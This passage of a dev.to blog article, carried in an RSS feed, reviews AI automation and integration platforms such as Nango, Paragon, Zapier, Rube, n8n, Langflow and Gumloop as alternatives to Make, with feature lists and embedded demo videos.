&lt;li&gt;The MCP server from Merge lets your AI agent treat all those integrations as “tools” it can call via MCP.&lt;/li&gt;
&lt;li&gt;Merge gives you SDKs, sandboxes, and developer tools to build faster without reinventing everything.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Want to get a quick video overview? Here you go, the CEO Shensi Ding herself explains how Merge helps. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/XdIvDqh0ro0"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  4. &lt;a href="https://nango.dev/" rel="noopener noreferrer"&gt;Nango&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Developer infrastructure for product integrations with 500+ APIs.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fce3jai3t8xwbrwvm72jr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fce3jai3t8xwbrwvm72jr.png" alt="Nango"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Nango is all about giving developers infrastructure so they don't have to build every connector from scratch. It provides tools and building blocks to manage auth, syncing, webhooks, and custom logic, all with full control over how data flows.&lt;/p&gt;

&lt;p&gt;I don't see much advantage to using Nango over other tools I've mentioned, but it's worth giving a shot.&lt;/p&gt;

&lt;p&gt;What Nango lets you do:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Ship integrations to 500+ APIs quickly with prebuilt templates, auth handling, rate-limit logic, and more.&lt;/li&gt;
&lt;li&gt;Write &lt;strong&gt;Functions&lt;/strong&gt; (TypeScript code) that run inside Nango for custom logic: data transformations, webhook handling, or special API quirks.&lt;/li&gt;
&lt;li&gt;Sync data both ways (read &amp;amp; write), manage webhooks, and handle complex API workflows.&lt;/li&gt;
&lt;li&gt;Self-host locally or use Nango’s cloud, with architecture built for reliability, observability, and scale.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Here’s an intro video demo to Nango. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/pvUpbi04IjQ"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  5. &lt;a href="https://useparagon.com/" rel="noopener noreferrer"&gt;Paragon&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Ship every integration your customers need with 130+ pre-built connectors.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq8svo5o92t1tf28x7r1b.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq8svo5o92t1tf28x7r1b.png" alt="Paragon"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Paragon is a tool that helps you add integrations to your product quickly. It comes with 130+ ready-made connectors, and you can also build your own custom ones on the same platform.&lt;/p&gt;

&lt;p&gt;Here’s what Paragon gives you:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;It handles authentication, token refresh, and API quirks so you don’t have to.&lt;/li&gt;
&lt;li&gt;You can use its &lt;strong&gt;Custom Integration Builder&lt;/strong&gt; to create new connectors in minutes when a prebuilt one doesn’t exist.&lt;/li&gt;
&lt;li&gt;It supports embedding the Connect UI (for users linking accounts) or going headless if you want full control.&lt;/li&gt;
&lt;li&gt;Your integration logic can run as workflows (with retries, debugging, concurrency) or in TypeScript for when custom code is needed.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Here's a quick video intro to Paragon. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/eD2a7LlCjQM"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  For Non-Developers
&lt;/h2&gt;




&lt;h2&gt;
  
  
  1. &lt;a href="https://zapier.com/" rel="noopener noreferrer"&gt;Zapier&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ The most connected no-code AI orchestration platform, integrating with 8,000+ apps.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqtfkdah0wsug8nced4js.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqtfkdah0wsug8nced4js.png" alt="Zapier"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Zapier is a veteran in the automation game, and now it’s evolving fast into an &lt;strong&gt;AI orchestration tool&lt;/strong&gt; too. You build workflows (called “Zaps”) that let actions in one app trigger responses in another (no coding needed, as you guessed it 😉).&lt;/p&gt;

&lt;p&gt;With Zapier, you can:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Automate repetitive tasks across multiple apps (Slack, Gmail, CRMs, etc.)&lt;/li&gt;
&lt;li&gt;Use AI functions to route or act on data mid-workflow&lt;/li&gt;
&lt;li&gt;Build “Interfaces” (custom forms/UIs) that feed into Zaps&lt;/li&gt;
&lt;li&gt;Use “Tables” as lightweight databases for your workflows&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;And because Zapier supports thousands of apps, chances are the tools you already use are already supported.&lt;/p&gt;

&lt;p&gt;Sounds cool? Here's a quick tutorial to get your hands on Zapier. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/JtdUgJGI_Oo"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  2. &lt;a href="https://rube.app/" rel="noopener noreferrer"&gt;Rube&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ MCP server that connects your AI tools with 500+ apps.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fltv1ujprz1xqhcd82sdv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fltv1ujprz1xqhcd82sdv.png" alt="Rube.app"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If you’ve come across the term &lt;strong&gt;MCP&lt;/strong&gt; before, you know it stands for &lt;a href="https://modelcontextprotocol.io/introduction" rel="noopener noreferrer"&gt;Model Context Protocol&lt;/a&gt;. In simple terms, it’s a bridge that lets AI models talk to external apps and services, giving them both data and the ability to take action.&lt;/p&gt;

&lt;p&gt;Rube acts as a &lt;strong&gt;hosted MCP server&lt;/strong&gt; that bundles integrations with popular tools like Slack, Gmail, Facebook, and many more. Instead of setting up servers and wiring APIs yourself, you instantly unlock access to &lt;strong&gt;over 500 apps&lt;/strong&gt; right inside your AI chat tools.&lt;/p&gt;

&lt;p&gt;To see what’s available, you can browse the &lt;a href="https://rube.app/marketplace" rel="noopener noreferrer"&gt;Rube marketplace&lt;/a&gt;, which lists all the supported apps.&lt;/p&gt;

&lt;p&gt;Getting started is simple:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Install Rube on your preferred platform, or&lt;/li&gt;
&lt;li&gt;Sign up on the &lt;a href="https://rube.app/" rel="noopener noreferrer"&gt;web app&lt;/a&gt;, connect an app, and test it directly in your browser.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv5odjsztv7joasgm5kc3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv5odjsztv7joasgm5kc3.png" alt="Rube installation"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here’s a quick demo that shows Rube in action 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/ZFI83b0TB3o"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  3. &lt;a href="https://n8n.io/" rel="noopener noreferrer"&gt;n8n&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ The world’s most popular open-source no-code automation platform.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh1m5hn9f2x3v17bjadq3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh1m5hn9f2x3v17bjadq3.png" alt="n8n.io"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;n8n is an open-source platform that makes it easy to create automation workflows, AI agents, and integrations without heavy coding. You get a &lt;strong&gt;visual canvas&lt;/strong&gt; where you drag and connect nodes to link apps, APIs, and logic together.&lt;/p&gt;

&lt;p&gt;The best part? It’s completely &lt;strong&gt;free and open-source&lt;/strong&gt;. You can run it on your own machine, deploy it in the cloud, or use their hosted version if you want a plug-and-play option.&lt;/p&gt;

&lt;p&gt;With n8n, you can:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Connect hundreds of apps and databases right out of the box&lt;/li&gt;
&lt;li&gt;Add JavaScript or Python when you need advanced custom logic&lt;/li&gt;
&lt;li&gt;Build one-off automations or scale up to production-grade workflows&lt;/li&gt;
&lt;li&gt;Automate almost anything that exposes an API&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In short, if there’s an API, chances are you can automate it with n8n. 🤯&lt;/p&gt;

&lt;p&gt;If you want to see what’s possible, check out this quick walkthrough from &lt;a href="https://youtube.com/@NetworkChuck" rel="noopener noreferrer"&gt;NetworkChuck&lt;/a&gt;. It’s a great introduction to how powerful n8n can be 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/ONgECvZNI3o"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  4. &lt;a href="https://langflow.org/" rel="noopener noreferrer"&gt;Langflow&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Low-code AI builder for agentic and RAG applications.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Finbpou1ttmr784nfhnuy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Finbpou1ttmr784nfhnuy.png" alt="Langflow"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Langflow gives you a drag-and-drop visual interface that lets you build complex AI workflows without writing every line of code.&lt;/p&gt;

&lt;p&gt;Under the hood, it’s powered by Python and gives you full access to customize components, hook into APIs, or integrate vector stores.&lt;/p&gt;

&lt;p&gt;You can:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Quickly iterate using visual flows and reusable components&lt;/li&gt;
&lt;li&gt;Orchestrate multi-agent systems with conversation control and retrieval logic&lt;/li&gt;
&lt;li&gt;Turn your flows into APIs, JSON exports, or even MCP servers for integration&lt;/li&gt;
&lt;li&gt;Support major LLMs, databases, and tools out of the box&lt;/li&gt;
&lt;li&gt;As always, there's a lot more...&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Take a look at the Langflow &lt;a href="https://docs.langflow.org/" rel="noopener noreferrer"&gt;docs&lt;/a&gt; to learn more.&lt;/p&gt;

&lt;p&gt;Here's a quick intro video to Langflow 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/l-t65yQ9sKA"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  5. &lt;a href="https://gumloop.com/" rel="noopener noreferrer"&gt;Gumloop&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ A no-code platform that lets you build AI workflows using drag-and-drop nodes.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffmm8ajij68u44seducc6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffmm8ajij68u44seducc6.png" alt="Gumloop"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Gumloop works similarly to Rube or n8n by giving you a visual canvas where you link building blocks (called “nodes”) to design workflows.&lt;/p&gt;

&lt;p&gt;You place triggers, logic, API calls, AI prompts, or integrations on a canvas, connect them, and deploy. It handles orchestration behind the scenes.&lt;/p&gt;

&lt;p&gt;What you can do with Gumloop:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Build workflows that fetch data, call AI models, transform it, and push results to apps like Google Sheets, Slack, CRMs, etc.&lt;/li&gt;
&lt;li&gt;Use &lt;strong&gt;subflows&lt;/strong&gt; so you can reuse chunks of logic inside bigger flows.&lt;/li&gt;
&lt;li&gt;Integrate with services like Slack, Salesforce, Airtable, Outlook, GitHub, Google, and more.&lt;/li&gt;
&lt;li&gt;Use its built-in AI features to scrape websites, analyze content, generate text, etc., all inside flows.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Want to see it in action? Here’s a demo showing a real workflow built using Gumloop 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/QFc7jXZ2pdE"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;blockquote&gt;
&lt;p&gt;If you know of any other useful AI automation tools that I haven't mentioned in this article, please share them in the comments section below. 👇🏻&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;These are your top 10 Make alternative &lt;strong&gt;AI automation&lt;/strong&gt; tools for 2025, and that wraps up this article. Thank you so much for reading! 🫡&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff9406elawoiefpa83dlu.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff9406elawoiefpa83dlu.gif" alt="Bye Bye GIF"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>productivity</category>
      <category>ai</category>
      <category>programming</category>
    </item>
  </channel>
</rss>
